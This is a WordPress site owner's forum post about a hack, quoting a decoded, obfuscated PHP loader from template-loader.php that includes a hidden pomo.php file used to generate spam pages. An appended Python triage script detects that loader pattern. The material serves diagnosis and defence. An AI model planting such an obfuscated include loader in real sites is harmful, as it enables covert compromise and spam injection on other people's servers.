Site Hacked via template-loader.php File
I found a big php block full of rot13’s and eval’s which decoded into this:
$GLOBALS['_416406938_']=Array();
function _1424099673($i){$a=Array('L2hvbWUvcm9yX3BvZGNhc3RfYWRtaW4vcmVzZWFyY2hvbnJlbGlnaW9uLm9yZy93cC1pbmNsdWRlcy9wb21vL3BvbW8ucGhw');return base64_decode($a[$i]);}
include_once(_1424099673(0));
That translates into
$GLOBALS['_416406938_']=Array();
include_once('/home/ror_podcast_admin/researchonreligion.org/wp-includes/pomo/pomo.php');
That file contains more to be decoded, which results in a big block of stuff I won’t bother posting, which has the effect of creating a bunch of spam landing pages for a bunch of common spam topics like viagra, etc. These pages are loaded from a bunch of encoded/zipped/rot’d files in wp-includes/js/tinymce/plugins/wpgallery/img/xml which appear to have been unzipped from a file called compressed.zip.
I’d love any info anyone could provide on how this could have gotten started. I’d greatly appreciate it, as I had permissions set along the lines of what’s laid out in the Hardening WordPress guidelines and was running at least WordPress 3.2.0 (I can’t remember if I’d updated beyond that).
Thanks.
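A triage sketch for the loader pattern quoted in the post above, added here as an example and not part of the original post: it flags PHP source in which an include takes a function call as its argument and a base64 string literal decodes to an absolute filesystem path. The function names, the regexes and the `suspicious` rule are assumptions of this example, and the sample input is constructed from the decoded snippet in the post.

```python
import base64
import binascii
import re

# Constructed sample: the decoded loader quoted in the post, with straight quotes.
SAMPLE = (
    "$GLOBALS['_416406938_']=Array();\n"
    "function _1424099673($i){$a=Array('L2hvbWUvcm9yX3BvZGNhc3RfYWRtaW4vcmVzZWFyY2hvbnJlbGlnaW9uLm9yZy93cC1pbmNsdWRlcy9wb21vL3BvbW8ucGhw');"
    "return base64_decode($a[$i]);}\n"
    "include_once(_1424099673(0));\n"
)

# Quoted string literals made only of base64 characters (16 or more).
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
# include/require whose argument starts with a function call instead of a
# string literal. Benign calls such as dirname(...) match too, so this is
# only a signal to combine with the decoded-path check below.
DYNAMIC_INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\b\s*\(?\s*(\$?\w+)\s*\("
)

def decoded_paths(php_source):
    """Return base64 literals that decode to printable absolute paths."""
    hits = []
    for literal in B64_LITERAL.findall(php_source):
        try:
            text = base64.b64decode(literal, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue  # not valid base64, or decodes to binary data
        if text.startswith("/") and text.isprintable():
            hits.append(text)
    return hits

def triage(php_source):
    """Summarise the indicators found in one PHP file's contents."""
    includes = DYNAMIC_INCLUDE.findall(php_source)
    paths = decoded_paths(php_source)
    return {
        "dynamic_includes": includes,
        "hidden_paths": paths,
        "uses_base64_decode": "base64_decode" in php_source,
        # Assumed rule: both signals together mark the file for manual review.
        "suspicious": bool(includes and paths),
    }

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Any path reported under `hidden_paths` names the next file to inspect, which is how the post's author was led to `pomo.php`.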